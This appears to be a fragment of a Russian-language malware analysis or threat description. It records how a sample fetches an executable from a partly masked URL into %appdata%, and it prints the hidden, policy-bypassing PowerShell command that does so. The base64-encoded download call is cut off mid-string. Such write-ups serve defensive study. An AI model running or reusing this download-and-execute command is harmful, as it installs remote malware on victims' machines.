Техническая информация
- http://lk##f.com/fi.exe как %appdata%\rlpjzx.exe
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe -nop -wind hidden -Exec Bypass -noni -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0A...